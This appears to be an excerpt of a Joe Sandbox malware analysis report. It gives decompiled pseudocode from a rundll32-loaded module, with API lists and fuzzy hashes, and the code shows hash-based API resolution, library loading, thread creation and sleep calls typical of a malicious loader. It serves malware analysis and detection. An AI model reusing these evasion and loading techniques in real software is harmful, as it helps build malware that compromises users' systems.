                          				 *((long long*)(_t103 + 0x10)) = _t94;
                          				 *((long long*)(_t103 + 0x20)) = __rsi;
                          				_t97 = _t96 - 0x30;
                          				_t71 =  *0xd933d458;
                          				_t5 = _t103 + 0x18; // 0xfb849f5f
                          				E0000021D21DD9339A38(_t53, _t71, __rbx, _t5, __rdx,  *((intOrPtr*)(_t71 + 8)));
                          				_t7 = _t97 + 0x70; // 0xfb849f8f
                          				_t29 = E0000021D21DD9335BA4(_t7);
                          				_t8 = _t97 + 0x70; // 0xfb849f8f
                          				r13d = _t29;
                          				r13d = r13d - ((r13d - (0x24924925 * r13d >> 0x20) >> 1) + (0x24924925 * r13d >> 0x20) >> 2) * 7;
                          				E0000021D21DD9335BA4(_t8);
                          				_t13 = _t97 + 0x70; // 0xfb849f8f
                          				_t18 = _t107 + 3; // 0x3
                          				E0000021D21DD93313EC(_t18, _t71, _t73, _t13);
                          				if (_t71 == 0) goto 0xd93325bd;
                          				_t19 = _t94 + 3; // 0x3
                          				_t20 = _t97 + 0x70; // 0xfb849f8f
                          				E0000021D21DD93313EC(_t19, _t71, _t73, _t20);
                          				if (_t71 == 0) goto 0xd93325af;
                          				_t22 = _t107 + 0xd; // 0xd
                          				r8d = _t94 + _t22;
                          				_t50 = HeapAlloc(_t112, _t109, _t107);
                          				if (_t71 == 0) goto 0xd93325a1;
                          				 *((long long*)(_t96 - 0x30 + 0x20)) = _t71;
                          				0xd933b158();
                          				 *__rdx = _t50;
                          				HeapFree(_t104, _t88);
                          				return HeapFree(??, ??, ??);
                          			}















                          0x21dd93324b0
                          0x21dd93324b0
                          0x21dd93324b3
                          0x21dd93324b7
                          0x21dd93324bb
                          0x21dd93324c8
                          0x21dd93324cc
                          0x21dd93324e3
                          0x21dd93324ea
                          0x21dd93324ef
                          0x21dd93324f4
                          0x21dd93324fe
                          0x21dd9332503
                          0x21dd933251a
                          0x21dd933251d
                          0x21dd9332522
                          0x21dd9332535
                          0x21dd9332541
                          0x21dd933254c
                          0x21dd933254e
                          0x21dd9332551
                          0x21dd9332556
                          0x21dd9332561
                          0x21dd9332563
                          0x21dd933256d
                          0x21dd9332572
                          0x21dd933257e
                          0x21dd9332594
                          0x21dd9332599
                          0x21dd933259e
                          0x21dd93325a9
                          0x21dd93325dc

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$AllocFree
                          • String ID:
                          • API String ID: 1379380650-0
                          • Opcode ID: 6319a469fd09f79597659ee7f8e00f8cd3230aed5a594dea25eb0ec95d591eb3
                          • Instruction ID: fe61452bbc9acf3b739c219922871a52ae8ea8eeb7b8483daccdb35f30a37cf9
                          • Opcode Fuzzy Hash: 6319a469fd09f79597659ee7f8e00f8cd3230aed5a594dea25eb0ec95d591eb3
                          • Instruction Fuzzy Hash: CF31B237300B45C6EB08DF2AE80958977E4F798B84F895131AE1C87B68EE39D506C700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: AllocHeap
                          • String ID:
                          • API String ID: 4292702814-0
                          • Opcode ID: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                          • Instruction ID: 103e7ffe31a84158ad8ad1d788d0678d612d615502919f62d3769e24873bb0cb
                          • Opcode Fuzzy Hash: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                          • Instruction Fuzzy Hash: CD518D73604B90C6D768CF06F448B9EB7A4F794B94F119215EE8953B68DF39C8A1CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 29%
                          			E0000021D21DD9335FC8(long long* __rax, long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, void* _a24, long long _a32) {
                          				long long* _t32;
                          				long long* _t35;
                          				long long _t41;
                          				void* _t56;
                          				void* _t57;
                          
                          				_t32 = __rax;
                          				_a8 = __rbx;
                          				_a16 = __rbp;
                          				_a32 = __rsi;
                          				_t48 =  *0xd933d458;
                          				E0000021D21DD933908C(0x2d4b080e, __rax,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t32 == 0) goto 0xd9336006;
                          				LoadLibraryA(??); // executed
                          				_t35 = _t32;
                          				goto 0xd9336008;
                          				if (_t35 == 0) goto 0xd9336048;
                          				if (E0000021D21DD93340F8(_t35,  &_a24, _t56, _t57) != 0) goto 0xd933602e;
                          				_t41 = _a24;
                          				 *_t41 = _t35;
                          				 *__rdx = _t41;
                          				goto 0xd9336066;
                          				E0000021D21DD933908C(0xc8e2960c, _t32,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t32 == 0) goto 0xd9336066;
                          				 *_t32();
                          				goto 0xd9336066;
                          				E0000021D21DD933908C(0xc06f8334, _t32,  *((intOrPtr*)(_t48 + 0x18)));
                          				if (_t32 == 0) goto 0xd9336061;
                          				 *_t32();
                          				goto 0xd9336066;
                          				return 0x7f;
                          			}








                          0x21dd9335fc8
                          0x21dd9335fc8
                          0x21dd9335fcd
                          0x21dd9335fd2
                          0x21dd9335fdc
                          0x21dd9335ff2
                          0x21dd9335ffa
                          0x21dd9335fff
                          0x21dd9336001
                          0x21dd9336004
                          0x21dd933600b
                          0x21dd933601e
                          0x21dd9336020
                          0x21dd9336025
                          0x21dd9336028
                          0x21dd933602c
                          0x21dd9336037
                          0x21dd933603f
                          0x21dd9336044
                          0x21dd9336046
                          0x21dd9336051
                          0x21dd9336059
                          0x21dd933605b
                          0x21dd933605f
                          0x21dd933607c

                          APIs
                            • Part of subcall function 0000021DD933908C: SetLastError.KERNEL32 ref: 0000021DD93390C8
                          • LoadLibraryA.KERNELBASE(?,?,00000000,0000021DD9338947,?,?,?,?,?,0000021DD9339D9C), ref: 0000021DD9335FFF
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: ErrorLastLibraryLoad
                          • String ID:
                          • API String ID: 3568775529-0
                          • Opcode ID: 99d26a6194f647cbc272d2d1eeaeaa4141e7c0158a623e847e66b8beeb9b8dfc
                          • Instruction ID: 43e477756de005d72e5764fdb326a2b2d114b10516807cea1ef3e340f2717ad5
                          • Opcode Fuzzy Hash: 99d26a6194f647cbc272d2d1eeaeaa4141e7c0158a623e847e66b8beeb9b8dfc
                          • Instruction Fuzzy Hash: D711B633359740DAEE289F51B54629D5260E7E8BC4F1C64319E4E4776EDE3AD5608310
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 24%
                          			E0000021D21DD933374C(void* __rax, long long __rbx, void* __rcx, long long __rsi, long long _a8, long long _a16) {
                          				long long _v16;
                          				intOrPtr _v24;
                          				void* _t25;
                          
                          				_t25 = __rax;
                          				_a8 = __rbx;
                          				_a16 = __rsi;
                          				asm("lock add dword [edi+0x38], 0x1");
                          				E0000021D21DD933908C(0x82e0b333, __rax,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t25 == __rbx) goto 0xd933379a;
                          				_v16 = __rbx;
                          				_v24 = 0;
                          				CreateThread(??, ??, ??, ??, ??, ??); // executed
                          				goto 0xd933379d;
                          				if (__rbx != __rbx) goto 0xd93337c7;
                          				E0000021D21DD933908C(0xc06f8334, __rbx,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (__rbx == __rbx) goto 0xd93337bb;
                          				 *((long long*)(__rbx))();
                          				goto 0xd93337c0;
                          				asm("lock add dword [edi+0x38], 0xffffffff");
                          				goto 0xd93337cb;
                          				 *((long long*)(__rcx + 0x20)) = __rbx;
                          				return 0x7f;
                          			}






                          0x21dd933374c
                          0x21dd933374c
                          0x21dd9333751
                          0x21dd9333765
                          0x21dd9333773
                          0x21dd933377d
                          0x21dd933378d
                          0x21dd9333792
                          0x21dd9333796
                          0x21dd9333798
                          0x21dd93337a0
                          0x21dd93337ab
                          0x21dd93337b3
                          0x21dd93337b5
                          0x21dd93337b9
                          0x21dd93337c0
                          0x21dd93337c5
                          0x21dd93337c7
                          0x21dd93337dc

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: CreateErrorLastThread
                          • String ID:
                          • API String ID: 1689873465-0
                          • Opcode ID: 45e0da64f60473eee569fe6e4de3b3bbb8319c81642f91410b74efe5917603bf
                          • Instruction ID: 1e360d50ea08f39711d7ca35d252468b78151a3838aac1801a1edb086dd55820
                          • Opcode Fuzzy Hash: 45e0da64f60473eee569fe6e4de3b3bbb8319c81642f91410b74efe5917603bf
                          • Instruction Fuzzy Hash: F501F977344740C7E7688F61B44829A6360F398B94F549A359F5D437B8DF39D4518700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E0000021D21DD933118C(long long* __rax, long long __rbx, long long _a8) {
                          				long long* _t21;
                          				intOrPtr _t23;
                          
                          				_t21 = __rax;
                          				_a8 = __rbx;
                          				E0000021D21DD933908C(0x38e683e4, __rax,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t21 == 0) goto 0xd93311b9;
                          				SleepEx(??, ??); // executed
                          				_t23 =  *0xd933d440;
                          				if (_t23 == 0) goto 0xd93311e8;
                          				if ( *((long long*)(_t23 + 0x20)) == 0) goto 0xd93311e8;
                          				E0000021D21DD933908C(0xf2d20ec6, _t21,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t21 == 0) goto 0xd93311e8;
                          				return  *_t21();
                          			}





                          0x21dd933118c
                          0x21dd933118c
                          0x21dd93311a6
                          0x21dd93311ae
                          0x21dd93311b7
                          0x21dd93311b9
                          0x21dd93311c3
                          0x21dd93311ca
                          0x21dd93311d5
                          0x21dd93311dd
                          0x21dd93311f2

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: ErrorLastSleep
                          • String ID:
                          • API String ID: 1458359878-0
                          • Opcode ID: d3fae3e83e090e59505a5133aa49706f85494772516239868393b1a2c487819d
                          • Instruction ID: 0860fdb348e3a5e5522213972ad6128f067860b791619299023bcf7756039265
                          • Opcode Fuzzy Hash: d3fae3e83e090e59505a5133aa49706f85494772516239868393b1a2c487819d
                          • Instruction Fuzzy Hash: 07F01D33740640C2FF689FA2B5493E913A1ABE9794F1C62169A2C473EDCF36D891C350
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 73%
                          			_entry_(void* __ecx, void* __edx, long long __rcx, void* __r8) {
                          				void* __rbx;
                          				void* _t2;
                          				long long* _t15;
                          				long long _t16;
                          				void* _t20;
                          				long long _t21;
                          				long long _t22;
                          				void* _t24;
                          				void* _t25;
                          
                          				_t17 = __rcx;
                          				if (__edx == 0) goto 0xd933697b;
                          				if (__edx != 1) goto 0xd9336998;
                          				_t20 = __r8; // executed
                          				_t2 = E0000021D21DD9334DB4(_t16, __rcx, _t21, _t22, _t24, _t25); // executed
                          				if (_t2 == 0) goto 0xd9336998;
                          				goto 0xd9336998;
                          				E0000021D21DD9336CE4(_t15, _t16, _t17, _t20, _t22);
                          				if ( *0xd933d458 == 0) goto 0xd9336998;
                          				HeapDestroy(??);
                          				return 0;
                          			}












                          0x21dd9336958
                          0x21dd9336965
                          0x21dd9336969
                          0x21dd933696b
                          0x21dd933696e
                          0x21dd9336975
                          0x21dd9336979
                          0x21dd933697d
                          0x21dd933698c
                          0x21dd9336992
                          0x21dd933699f

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Destroy$AllocCreate
                          • String ID:
                          • API String ID: 3351204586-0
                          • Opcode ID: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                          • Instruction ID: 8b9704613c7de7112802c8b6a997515866f89bd6e9e1eff519e759e3185e7423
                          • Opcode Fuzzy Hash: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                          • Instruction Fuzzy Hash: DDE04877781140C9FF6C5F62B59E3F903925B74748F5478794D05453BDCD1BD8A58210
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 66%
                          			E0000021D21DD9334A80(void* __edx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, long long __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, intOrPtr _a40, unsigned int _a48, unsigned int _a56, intOrPtr _a64) {
                          				intOrPtr _v40;
                          				void* _t28;
                          				intOrPtr _t32;
                          				void* _t35;
                          				intOrPtr _t42;
                          				void* _t43;
                          				void* _t61;
                          				long long* _t62;
                          				void* _t64;
                          				intOrPtr* _t66;
                          				intOrPtr* _t79;
                          				long long* _t82;
                          				void* _t85;
                          				void* _t87;
                          				void* _t96;
                          				void* _t98;
                          				void* _t101;
                          				intOrPtr _t102;
                          
                          				_t81 = __rsi;
                          				_t66 = __rcx;
                          				_t61 = _t87;
                          				 *((long long*)(_t61 + 8)) = __rbx;
                          				 *((long long*)(_t61 + 0x10)) = __rbp;
                          				 *((long long*)(_t61 + 0x18)) = __rsi;
                          				 *((long long*)(_t61 + 0x20)) = __rdi;
                          				_t62 =  *0xd933d458;
                          				_t102 =  *__rcx;
                          				_t85 = __r9;
                          				_t64 = __r8;
                          				_t95 = __rdx;
                          				_t79 = __rcx;
                          				if (__rdx == 0) goto 0xd9334adc;
                          				_t6 = _t66 + 0x10; // 0x2
                          				_t7 = _t66 + 8; // -6
                          				if (E0000021D21DD9339B88(_t35, __r8, __rdx, _t7, __rsi, _t6) != 0) goto 0xd9334adc;
                          				goto 0xd9334b8b;
                          				r12d =  *((intOrPtr*)(_t79 + 0x68));
                          				r9d = _a56;
                          				r8d = r12d;
                          				_v40 = _a64;
                          				_t28 = E0000021D21DD93331C0(_t64, _t79, _t64, _t95); // executed
                          				if (_t28 != 0) goto 0xd9334b8b;
                          				if (_t85 == 0) goto 0xd9334b22;
                          				E0000021D21DD9336C34(_t64, _t85, _t79, _t81, _t85, _t6, _t101, _t98);
                          				_t82 = _t62;
                          				if (_t62 == 0) goto 0xd9334ad2;
                          				if (_a48 >> 0x14 == 0) goto 0xd9334b35;
                          				goto 0xd9334b3b;
                          				E0000021D21DD933908C(0x41b0cf8e, _t62,  *((intOrPtr*)(_t102 + 0x48)));
                          				if (_t62 == 0) goto 0xd9334b61;
                          				r9d =  *(_t79 + 0x6c);
                          				r8d = r12d;
                          				_v40 =  *((intOrPtr*)(_t79 + 0x70));
                          				 *_t62();
                          				r9d = _a48;
                          				_t32 = E0000021D21DD93375F8(_t43, _t62, _t64, _t79, _t82, _a40); // executed
                          				_t42 = _t32;
                          				if (_t82 == 0) goto 0xd9334b8b;
                          				HeapFree(_t96, ??);
                          				 *((intOrPtr*)(_t79 + 0x58)) = _t42;
                          				return _t42;
                          			}





















                          0x21dd9334a80
                          0x21dd9334a80
                          0x21dd9334a80
                          0x21dd9334a83
                          0x21dd9334a87
                          0x21dd9334a8b
                          0x21dd9334a8f
                          0x21dd9334a9d
                          0x21dd9334aa4
                          0x21dd9334aad
                          0x21dd9334ab0
                          0x21dd9334ab3
                          0x21dd9334ab6
                          0x21dd9334abc
                          0x21dd9334abe
                          0x21dd9334ac2
                          0x21dd9334ad0
                          0x21dd9334ad7
                          0x21dd9334adc
                          0x21dd9334ae7
                          0x21dd9334aef
                          0x21dd9334af8
                          0x21dd9334afc
                          0x21dd9334b05
                          0x21dd9334b0e
                          0x21dd9334b15
                          0x21dd9334b1a
                          0x21dd9334b20
                          0x21dd9334b2b
                          0x21dd9334b33
                          0x21dd9334b44
                          0x21dd9334b4c
                          0x21dd9334b52
                          0x21dd9334b55
                          0x21dd9334b5b
                          0x21dd9334b5f
                          0x21dd9334b61
                          0x21dd9334b71
                          0x21dd9334b76
                          0x21dd9334b7b
                          0x21dd9334b85
                          0x21dd9334b95
                          0x21dd9334bae

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Alloc$Free
                          • String ID:
                          • API String ID: 1549400367-0
                          • Opcode ID: 0438c88f5e4c29cc0bfbf823165f6398d9b9537c29dc3537e3679cfc667b61ef
                          • Instruction ID: 44bdef4d7e350b98755e573bc52fba58f5b1ed4c948e9aa01b8a12cef991ec83
                          • Opcode Fuzzy Hash: 0438c88f5e4c29cc0bfbf823165f6398d9b9537c29dc3537e3679cfc667b61ef
                          • Instruction Fuzzy Hash: AB318C37344784C6EB18DF6BA588799B7A0F7A8BD4F4890259F8847B69DF39D412CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 25%
                          			E0000021D21DD93330A4(long long* __rax, long long __rbx, void* __rcx, long long __rsi, intOrPtr* __r8, void* __r11) {
                          				intOrPtr _t36;
                          				long long* _t54;
                          				char* _t58;
                          				long long* _t62;
                          				long _t72;
                          				intOrPtr* _t75;
                          				long long _t77;
                          				void* _t79;
                          				void* _t80;
                          				long _t86;
                          				void* _t89;
                          
                          				_t54 = __rax;
                          				 *((long long*)(_t79 + 8)) = __rbx;
                          				 *((long long*)(_t79 + 0x10)) = _t77;
                          				 *((long long*)(_t79 + 0x18)) = __rsi;
                          				_t80 = _t79 - 0x60;
                          				_t75 = __r8;
                          				E0000021D21DD933908C(0xfb849f8f, __rax,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t54 == 0) goto 0xd93330f7;
                          				 *_t54();
                          				goto 0xd93330f9;
                          				_t8 = _t77 + 0x128ac584; // 0x128ac584
                          				r8d = _t72 + _t8; // executed
                          				HeapAlloc(_t89, _t86, _t72); // executed
                          				_t62 = _t54;
                          				if (_t54 == 0) goto 0xd93331a2;
                          				 *((intOrPtr*)(_t80 + 0x50)) =  *((intOrPtr*)(_t75 + 0xc));
                          				 *((intOrPtr*)(_t80 + 0x48)) =  *((intOrPtr*)(_t75 + 8));
                          				 *((intOrPtr*)(_t80 + 0x40)) =  *((intOrPtr*)(_t75 + 4));
                          				r9d = 0x186c6;
                          				 *((intOrPtr*)(_t80 + 0x38)) =  *_t75;
                          				 *((long long*)(_t80 + 0x30)) =  *((intOrPtr*)(__rcx + 8));
                          				_t36 =  *((intOrPtr*)(__rcx + 0x28));
                          				 *((intOrPtr*)(_t80 + 0x28)) = _t36;
                          				 *((long long*)(_t80 + 0x20)) =  *((intOrPtr*)(__rcx + 0x10));
                          				0xd933b158();
                          				r11d = _t36;
                          				_t58 =  *((intOrPtr*)(_t75 + 0x10));
                          				if (_t58 == 0) goto 0xd933319d;
                          				if ( *_t58 == 0x26) goto 0xd9333188;
                          				 *((char*)(__r11 + _t62)) = 0x26;
                          				r11d = r11d + 1;
                          				_t27 = _t72 + 1; // 0x1
                          				r8d = _t27;
                          				0xd93347b0();
                          				goto 0xd93331a2;
                          				 *((char*)(__r11 + _t62)) = 0;
                          				return _t36;
                          			}














                          0x21dd93330a4
                          0x21dd93330a4
                          0x21dd93330a9
                          0x21dd93330ae
                          0x21dd93330b8
                          0x21dd93330d8
                          0x21dd93330e3
                          0x21dd93330eb
                          0x21dd93330f1
                          0x21dd93330f5
                          0x21dd93330f9
                          0x21dd9333105
                          0x21dd9333108
                          0x21dd933310e
                          0x21dd9333114
                          0x21dd9333127
                          0x21dd9333138
                          0x21dd933313f
                          0x21dd9333145
                          0x21dd933314b
                          0x21dd933314f
                          0x21dd9333154
                          0x21dd9333159
                          0x21dd9333165
                          0x21dd933316a
                          0x21dd933316f
                          0x21dd9333172
                          0x21dd9333179
                          0x21dd933317e
                          0x21dd9333180
                          0x21dd9333185
                          0x21dd933318f
                          0x21dd933318f
                          0x21dd9333196
                          0x21dd933319b
                          0x21dd933319d
                          0x21dd93331be

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: AllocErrorHeapLast
                          • String ID:
                          • API String ID: 1314224567-0
                          • Opcode ID: 792cfed14a11566833059b30f49f861c70657ada4f2b2c0472a50125c3b06f7f
                          • Instruction ID: 9bce077035bf058173b2bdc43a8ec9982d016f44a1b23ffa80568b5ece3fd540
                          • Opcode Fuzzy Hash: 792cfed14a11566833059b30f49f861c70657ada4f2b2c0472a50125c3b06f7f
                          • Instruction Fuzzy Hash: 01316137604784DBD728DF16F44869A77A5F398B80F549129EE9E43768CF3AE941CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 35%
                          			E0000021D21DD9336DF0(long long __rbx, intOrPtr* __rcx, long long __rdx) {
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t96;
                          				void* _t116;
                          				void* _t121;
                          				intOrPtr _t123;
                          				void* _t130;
                          				char _t131;
                          				void* _t156;
                          				long long* _t198;
                          				long long* _t199;
                          				long long* _t201;
                          				char* _t218;
                          				char* _t219;
                          				long _t252;
                          				intOrPtr* _t253;
                          				long _t255;
                          				void* _t260;
                          				char* _t262;
                          				long long _t263;
                          				signed long long _t269;
                          				void* _t271;
                          				void* _t272;
                          				void* _t292;
                          				void* _t293;
                          				long _t300;
                          				long _t305;
                          				void* _t307;
                          
                          				_t292 = _t271;
                          				 *((long long*)(_t292 + 8)) = __rbx;
                          				 *((long long*)(_t292 + 0x10)) = __rdx;
                          				_t272 = _t271 - 0x40;
                          				r14d =  *0xd933d450;
                          				_t253 = __rcx;
                          				 *((long long*)(_t272 + 0x38)) =  *((intOrPtr*)( *0xd933d458 + 8));
                          				if (E0000021D21DD93391C8(_t121, r14d ^ 0x55e7ce26,  *((intOrPtr*)( *0xd933d458 + 8)), __rbx, __rdx, __rdx, __rcx, _t255, _t292 - 0x58, _t292 + 0x18, _t292) != 0) goto 0xd9337239;
                          				_t198 =  *_t253;
                          				 *((long long*)(_t272 + 0x98)) = _t198;
                          				 *((long long*)(_t272 + 0x30)) =  *((intOrPtr*)( *0xd933d458 + 8));
                          				if ( *((intOrPtr*)(_t272 + 0x20)) == 0) goto 0xd933703b;
                          				r13d = 0xfb849f8f;
                          				E0000021D21DD933908C(r13d, _t198,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t198 == 0) goto 0xd9336e8f;
                          				 *_t198();
                          				goto 0xd9336e91;
                          				r8d = 1;
                          				HeapAlloc(_t307, _t305, _t300);
                          				 *((long long*)(_t272 + 0x28)) = _t198;
                          				if (_t198 == 0) goto 0xd933722f;
                          				0xd93347b0();
                          				_t262 = _t198;
                          				if ( *_t262 == 0x20) goto 0xd9336edc;
                          				if ( *_t262 != 9) goto 0xd9336ee1;
                          				_t263 = _t262 + 1;
                          				goto 0xd9336ed0;
                          				if ( *_t263 == 0) goto 0xd9336f74;
                          				E0000021D21DD933908C(r13d, _t198,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t198 == 0) goto 0xd9336f03;
                          				 *_t198();
                          				goto 0xd9336f05;
                          				asm("cdq");
                          				_t15 = _t198 + 1; // 0x1
                          				r8d = _t15;
                          				HeapAlloc(_t293, _t252, _t255);
                          				if (_t198 == 0) goto 0xd9336f76;
                          				_t130 =  *_t263;
                          				if (_t130 == 0) goto 0xd9336f46;
                          				if (_t130 == 0x20) goto 0xd9336f42;
                          				_t218 = _t263 + 1;
                          				_t131 =  *_t218;
                          				if (_t131 != 0) goto 0xd9336f34;
                          				if (_t131 != 0) goto 0xd9336f48;
                          				if (_t218 == 0) goto 0xd9336f62;
                          				 *_t218 = 0;
                          				_t219 = _t218 + 1;
                          				if ( *_t219 == 0x20) goto 0xd9336f5d;
                          				if ( *_t219 != 9) goto 0xd9336f62;
                          				goto 0xd9336f53;
                          				 *_t198 = _t263;
                          				_t199 = _t198 +  *((intOrPtr*)( *0xd933d458 + 8));
                          				if (_t219 + 1 != 0) goto 0xd9336f2a;
                          				goto 0xd9336f7e;
                          				if (0 == 0) goto 0xd9337021;
                          				E0000021D21DD933908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0xd933d458 + 0x10)));
                          				if (_t199 == 0) goto 0xd9336fa8;
                          				 *_t199();
                          				 *((long long*)(_t253 + 0x40)) =  *((intOrPtr*)(_t272 + 0x28));
                          				 *((long long*)(_t253 + 0x48)) =  *((intOrPtr*)(_t272 + 0x90));
                          				 *((intOrPtr*)(_t253 + 0x50)) = sil;
                          				if ( *((char*)(_t253 + 0x70)) == 0) goto 0xd9336fcb;
                          				 *((char*)(_t253 + 0x70)) = 0;
                          				asm("lock and dword [edi+0x2c], 0xfffffffe");
                          				E0000021D21DD933908C(0x8d72aad2, _t199,  *((intOrPtr*)( *0xd933d458 + 0x10)));
                          				if (_t199 == 0) goto 0xd9336fea;
                          				 *_t199();
                          				if ( *((intOrPtr*)(_t253 + 0x40)) == 0) goto 0xd9337010;
                          				HeapFree(_t260, ??);
                          				HeapFree(??, ??, ??);
                          				goto 0xd9337040;
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				if (0x57 != 0) goto 0xd933723e;
                          				if (E0000021D21DD93391C8(0, r14d ^ 0x881e33f6, _t199,  *((intOrPtr*)(_t272 + 0x30)),  *((intOrPtr*)(_t272 + 0x88)),  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0xd9337239;
                          				_t96 = E0000021D21DD933672C( *((intOrPtr*)(_t272 + 0x20)),  *((intOrPtr*)(_t272 + 0x20)), _t272 + 0x98);
                          				_t123 =  *((intOrPtr*)(_t272 + 0x98));
                          				if (_t96 != 0) goto 0xd93370a8;
                          				if (_t123 == 0) goto 0xd9337239;
                          				 *((intOrPtr*)(_t253 + 0x28)) = _t123;
                          				if (E0000021D21DD93391C8(_t123, r14d ^ 0xa2dd2342, _t199,  *((intOrPtr*)(_t272 + 0x30)),  *((intOrPtr*)(_t272 + 0x88)),  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0xd9337166;
                          				_t46 = _t199 + 0x10; // 0x10
                          				_t116 = _t46;
                          				_t156 =  <  ?  *((void*)(_t272 + 0x90)) : _t116;
                          				E0000021D21DD933908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0xd933d458 + 0x10)));
                          				if (_t199 == 0) goto 0xd9337109;
                          				 *_t199();
                          				r8d = _t156;
                          				0xd93347b0();
                          				if (_t156 - _t116 >= 0) goto 0xd9337134;
                          				r8d = _t116 - _t156;
                          				0xd933487a();
                          				E0000021D21DD933908C(0x8d72aad2, _t199,  *((intOrPtr*)( *0xd933d458 + 0x10)));
                          				if (_t199 == 0) goto 0xd933714e;
                          				 *_t199();
                          				HeapFree(??, ??, ??);
                          				_t269 =  *((intOrPtr*)(_t272 + 0x88));
                          				r14d = r14d ^ 0x1a1a0866;
                          				if (E0000021D21DD93391C8(_t123, r14d, _t199,  *((intOrPtr*)(_t272 + 0x30)), _t269,  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0xd933723e;
                          				if (E0000021D21DD933672C( *((intOrPtr*)(_t272 + 0x20)),  *((intOrPtr*)(_t272 + 0x20)), _t272 + 0x98) == 0) goto 0xd933723e;
                          				if ( *((intOrPtr*)(_t272 + 0x98)) == 0) goto 0xd933723e;
                          				E0000021D21DD933908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0xd933d458 + 0x10)));
                          				if (_t199 == 0) goto 0xd93371de;
                          				 *_t199();
                          				E0000021D21DD933908C(0x9c66d81c, _t199,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t199 == 0) goto 0xd93371f8;
                          				 *_t199();
                          				_t201 =  *((intOrPtr*)(_t272 + 0x28)) + _t269 * 0x23c34600;
                          				 *((long long*)(_t272 + 0x28)) = _t201;
                          				 *((long long*)(_t253 + 0x30)) = _t201;
                          				E0000021D21DD933908C(0x8d72aad2, _t201,  *((intOrPtr*)( *0xd933d458 + 0x10)));
                          				if (_t201 == 0) goto 0xd933723e;
                          				 *_t201();
                          				goto 0xd933723e;
                          				goto 0xd9337040;
                          				return 1;
                          			}
































